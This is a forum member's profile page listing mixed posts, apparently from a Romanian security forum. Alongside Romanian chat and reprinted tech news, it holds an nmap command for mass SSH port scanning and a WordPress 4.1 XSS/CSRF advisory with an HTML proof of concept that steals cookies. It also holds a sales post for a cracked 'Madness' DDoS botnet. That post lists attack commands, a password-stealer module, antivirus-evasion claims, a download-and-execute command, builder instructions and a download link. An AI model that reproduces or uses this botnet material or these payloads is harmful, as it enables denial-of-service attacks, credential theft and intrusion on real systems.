Jump to content

htmanpro

Members
  • Posts

    39
  • Joined

  • Last visited

  • Days Won

    1

htmanpro last won the day on December 27 2014

htmanpro had the most liked content!

About htmanpro

  • Birthday 09/06/1996

Converted

  • Occupation
    Crescator de iarba:))
  • Interests
    aashdwahsdn, asdhwasd and asdhhwadw
  • Location
    127.0.0.1

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

htmanpro's Achievements

Newbie

Newbie (1/14)

66

Reputation

  1. Ho, gata! Si-a incercat si el norocu ce vreti acuma=))?
  2. De ce pula mea cenzurezi? On: Nu este permisa vanzarea/schimbarea/s.a.m.d ce implica rooturi
  3. htmanpro

    14/88

    Stai calm, nici ei nu te suporta pe tine:D! On: BUn venit
  4. htmanpro

    Ramas Bun RST

    Amante de intretinut.... On: Mane, eu nu te cunosc asa bine dar vizitez forumu de 1-2 ani ca guest si am vazut ca esti activ ai posturi utile, esti un membru de baza pe aici..Sper ca poate o sa revii vreodata..
  5. nmap -p 22 24.1.*.* -oN fisier.txt sau altfel nmap -p 22 24.5.0.1/16 -oS fisier.txt SAu nmap -p 22 24.1.0-255.1-254 -oN fisier.txt
  6. Document Title: =============== Wordpress 4.1 - XSS & CSRF Web Vulnerability Release Date: ============= 2014-12-30 Product & Service Introduction: =============================== https://wordpress.org/ Abstract Advisory Information: ============================== The Hackyard Security Group pentest team discovered a cross site request forgery issue and a cross site vulnerability in the Wordpress 4.1 Vulnerability Disclosure Timeline: ================================== 2014-12-27: Author Notification (0x0A) 2014-12-30: Public Disclosure Discovery Status: ================= Published Affected Product(s): ==================== Product: Wordpress 4.1 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A client-side cross site request forgery issue and a cross site scripting vulnerability has been discovered in the Wordpress version 4.1 The client-side cross site request forgery vulnerability allows remote attackers to force client-side requests to execute application functions. The client-side cross site scripting vulnerability allows remote attackers to inject malicious script codes to compromise administrator session data. The XSS vulnerability is located in comment values of the wp-comments-post.php file POST method request. Remote attackers are able to inject malicious script codes to the client-side application request. The CSRF vulnerability is located in the same value request and allows to request the account session data. Both issues are only exploitable on the client-side of the application and the request method to inject is POST. The security risk of the client-side web vulnerability is estimated as medium with a CVSS (common vulnerability scoring system) count of 2.5. Exploitation of the client-side web vulnerability requires no privileged web-application user account and low or medium user interaction. Successful exploitation of the vulnerabilities result in non-persistent phishing mails, session hijacking, non-persistent external redirect to malicious sources and client-side manipulation of affected or connected module context. Request Method(s): [+] POST Vulnerable Module(s): [+] comment Vulnerable Parameter(s): [+] comment= Affected Module(s): [+] wp-comments-post.php Proof of Concept (PoC): ======================= The client-side cross site request forgery issue and a cross site scripting vulnerability can be exploited by remote attackers with low or medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerabilities: You can use the following exploit code to verify the vulnerability. Save the code as .html. The malicious page needs to be surfed by a non expired administrator session to take over the user session data. PoC: wp-comments-post.php <html> <!-- CSRF PoC - generated by **0x0A** --> <body> <form action="http://127.0.0.1/wordpress/wp-comments-post.php" method="POST"> <input type="hidden" name="author" value="Pentest" /> <input type="hidden" name="email" value="pentest@hackyard.net" /> <input type="hidden" name="url" value="https://hackyard.net" /> <input type="alert" name="comment" value="<script>alert(document.cookie);</script>" /> <input id="submit" class="submit" type="submit" value="Post Comment" name="submit"> <input id="comment_post_ID" type="hidden" value="8" name="comment_post_ID"> <input id="comment_parent" type="hidden" value="0" name="comment_parent"> <input id="_wp_unfiltered_html_comment_disabled" type="hidden" value="d1a069167f" name="_wp_unfiltered_html_comment"> </form> </body> </html> Reference(s):Video ====================== LINK: https://www.youtube.com/watch?v=UD-iwqphWlk POC: https://www.youtube.com/watch?v=HL7ETe3A4Wg Solution - Fix & Patch: ======================= 2014-11-24: Filtering an html comments Security Risk: ============== The security risk of the cross site request forgery and cross site scripting vulnerability is estimated as medium. (CVSS 2.5) Credits & Authors: ================== Neo Hapsis aka 0x0A- Information Security Researcher [https://hackyard.net] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Hackyard Security Group disclaims all warranties, either expressed or implied, including the warranties of merchant ability and capability for a particular purpose. Hackyard Security Group or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Hackyard Security Group or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: https://hackyard.net Contact: admin@hackyard.net Facebook: facebook.com/Hackyard.net YouTube: youtube.com/user/HackyardSG Any modified copy or reproduction, including partially usages, of this file requires authorization from Hackyard Security Group. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Hackyard Security Group or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of Hackyard Security Group & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@hackyard.net) to get a permission. Source: hk
  7. Features - Written in c + +, easily crypt is lightweight (compressed sample <15KB) - Full compatibility with all windows family (x86 and x64) - Bot has 7 types of attacks - Extremely stable system. Load on CPU and ram is very powerful. - does not attract attention to UAC Windows Firewall - can install port, referal and cookies individually for each attack - Supports up to 10 targets simultaneously - has a very low load on the cpu with the new, complex system parsing Teams (all analogs parsing passes within a function in multiple threads - it's extra work load on the processor. New bot enters all data in the array before the attack and come ready function parameters: address, port, referral, etc.) - has enormous power output of more than 1500 http (and more 30,000 udp) requests per minute due to direct interaction with network drivers, even on Windows Desktop! (Only when using winsock) is about 10 times more than some analogues and several more top (on this indicator) competitors. - in the control panel are: the number of requests per minute, right in the system, the version of the system. - Supports bypassing Cloudflare protection (!) and many other, more simple. - support and slow get slow post! mode - indicated in the packet header off the cache (cache-control: no-cache), which increases the load on the server. - Bot protection of panel. Modules: - PassGrabber (stealer): this module find and decrypt passwords. 26 software units supported (on octouber 2014). price $150 for base licence, $250 for lite licence, free for full. Detection: Validation build (without crypt and packing) only 3 AV’s of all triggered suspicion (avira, clamav, vba32). during local tests Kaspersky, nNod32, Drweb, Avast all missed file in 100% of cases. Attack modes and commands: As the system is a professional syntax with commands, this seems complicated, but only at first glance =) • dd1 basic operation by http protocol method get, using sokkety. support *** cookies and $ $ $ ref and allows up to 10 targets simultaneously (separated by ";"). the fastest search volume attack. Example: DD1 = ?????? cookies *** $ $ $ referal; http://mail.ru cookies2 *** $ $ $ referal2 • dd2 the same treatment as dd1, only the method of post. added optional parameter @ @ @ post_data. also supports up to 10 goals. Example: dd2 = ????? ?.?.?. - ??????? ??????? ??????, ???????????? ??????? PHP, MySQL ? Perl. ????????? ??????????? ??????? ?? ????????? ?????. ??????? ????? ?? *** cookies $ $ $ referal @ @ @ login = yyy & password = hhh, this team posted a username and password yyy hhh a script • dd3 attack http get method using the system library wininet.dll. good old attack used in many delphi bots. slow due to the limitations of desktop windows. not support the referral and cookies, supports up to 10 targets. Example: dd3 = http://host.com/script.php • dd4 attack http post method using the system library wininet. the same as dd3, only post. Example: DD4 = @ @ @ http://host.com/script.php @ @ @ = login & password = yyy hhh • dd5 icmp attack (pings). supports up to 10 targets. Example dd5 = 198.168.0.1; 199.0.0.1 • dd6 udp attack. supports up to 10 targets. mandatory parameters: port and text. Example: dd6 = 192.168.0.2:27015 @ @ @ flud_text • dd7 attack http get method using the system library urmon.dll average speed attack, supports up to 10 targets and does not support cookies and referal • cfa command bypass the security cloudflare (!). used only during dd7. This is simple - the bot executes java script gets the desired cookie and cloudflare considers requests made dd7 authorized. Example: dd7 = ???? ???? ? ?????????, then (after fifteen minutes) cfa = ???? ???? ? ????????? • cmd command is executed on the command interpreter cmd.exe on the local machine. does not stop the execution of other commands. Example: cmd = net user goodwin / add • exe command to load and run the exe file. does not stop the execution of other commands. file will be saved under the same name, under which he was on the Internet. made three attempts to download a file. Example: exe = http://site.com/filename.exe Control Panel: We used a modified ~ 70% from another complex (purchased under agreements to resell and change), rewriting it almost completely, as it was found too many mistakes and did not like the code. Naturally everything was corrected and optimized - new pu you like it! Demonstration: how well the system is very powerful and to demonstrate the need 15-20 bots, which are always available - Sellers will try to demonstrate power. Prices: - Test License $0 (only for checking the forums and testers. updates not provided) - Lite Licence $300 (update/rebuild $100, upgrade to the new version $ 100) - Basic License $500 (Update / Rebuild $ 50 upgrade to the new version $ 100, the price of the modules will be installed later) - full license $950 (all updates Rebuild and modules are free) INSTRUCTIONS: 1) Setup panel, read the howto included. (PS: Your MasterKey is: 0x2222) 2) Open the builder (do not open "madnesscracked.exe) 3) Write in URL in the builder, the url are usually http://yourdomain.com/index.php 4) Click Update URL, should display a messagebox that the url has been changed. 5) Your file is madnesscracked.exe (after you update url) Downlaod: https://mega.co.nz/#!y85BkRzQ!b9mXFMehpzHGqxluTuMg_p8hh7oGAza9S1m8HxvPaqQ SourcE: trojanforge
  8. Salut, eu împreun? cu un prieten(SmartFX) ne-am apucat de creearea temelor wordpress ?i teme pentru alte platforme, template-uri html..Am "reu?it" s? modific?m o tem? imaginile+ unele scripturi+ css(Nu am creat-o de la 0 deoarece nu ?tim PHP). Demo Screenshoot -Tema este gratuit?! -PSD-urile(background/logo) se g?sesc în fi?ierul "images"! Download: Zippyshare.com - hitsmart-design.rar https://www.sendspace.com/file/8n5416 A?tept?m p?reri ?i critici!
  9. Pai ai instalat vrun addon "infectat" cu reclama aceea incearca sa le dezinstalezi pe toate sa vezi de la care e si dupa baga ce iti trebuie nu baga toate extensile de cacat!
  10. htmanpro

    [XSS] ESET NOD32

    Felicitari, frate! Din reward ne dai cate o bere de iese ceva:))
  11. nu ai bagat parola de la stealer si in config!
  12. Astronaut Barry Wilmore asked for a ratcheting socket wrench Astronauts on the International Space Station have used their 3-D printer to make a wrench from instructions sent up in an email. It is the first time hardware has been "emailed" to space. Nasa was responding to a request by ISS commander Barry Wilmore for a ratcheting socket wrench. Previously, if astronauts requested a specific item they could have waited months for it to be flown up on one of the regular supply flights. Mike Chen, founder of Made In Space, the company behind the 3-D printer, said: "We had overheard ISS Commander Barry Wilmore (who goes by "Butch") mention over the radio that he needed one, so we designed one in CAD and sent it up to him faster than a rocket ever could have." Mr Wilmore installed the printer on the ISS on 17 November. On 25 November he used the machine to fabricate its first object, a replacement part for the printer. Nasa says the capability will help astronauts be more self-reliant on future long duration space missions. Mike Chen added: "The socket wrench we just manufactured is the first object we designed on the ground and sent digitally to space, on the fly. "It also marks the end of our first experiment—a sequence of 21 prints that together make up the first tools and objects ever manufactured off the surface of the Earth." The other 21 objects were designed before the 3D printer was shipped to the space station in September on a SpaceX Dragon supply flight. line Analysis: David Shukman, BBC science editor If a 3D printer can churn out something as useful as a tool in space, what else is possible? Spare parts, components, even equipment, according to the company behind the printer, Made In Space. And that's just the start. As one might expect from an energetic Silicon Valley start-up, the vision is mind-boggling. Already it plans to send a larger 3D manufacturing machine into orbit next year. The ambition is for Nasa or other space agencies or companies to routinely send their printing orders up to the International Space Station and for a range of objects to be produced. This would open the way to create hardware not only for the ISS itself but also for equipment to be deployed beyond it, conceivably such as satellites. And, looking further ahead, the thinking becomes even more radical. Made In Space says it's been trying out possible raw materials for its printers including a substance similar to lunar soil. So in theory, a 3D printer despatched to the Moon might be able to dig into the lunar surface, scoop up what is called the regolith, and transform it into the elements needed for a moon base. That prospect is extremely distant, obviously. For the moment, the astronauts on board the ISS will be happy to know that if they need a new spanner, they can make one in under an hour. Source
  13. This is the first time automatic updates have been sent to Mac computers around the world Apple has sent out its first automatic security update for Mac computers as researchers warn about new bugs. Previously Apple has released security patches through its regular software update system which requires user approval. The latest bugs were so severe it felt it needed to get customers protected immediately, the firm said. "The update is seamless. It doesn't even require a restart," Apple spokesman Bill Evans told Reuters. The Mac bugs were mentioned in security bulletins issued last week by the Department of Homeland Security and the Carnegie Mellon University Software Engineering Institute. It identified dozens of technology companies, including Apple, whose products might be vulnerable. The vulnerability targets a component of its OS X operating system called the network time protocol (NTP) which is used for synchronising clocks on computer systems. The protocol is a global method of synchronising time over a network and has previously been exploited by hackers. Microsoft has been offering automatic updates for security flaws for some time. Apple developed technology for automatically pushing out security updates two years ago but has never previously used it. The firm said that it did not know of any cases where hackers had exploited the bug. Source
×
×
  • Create New...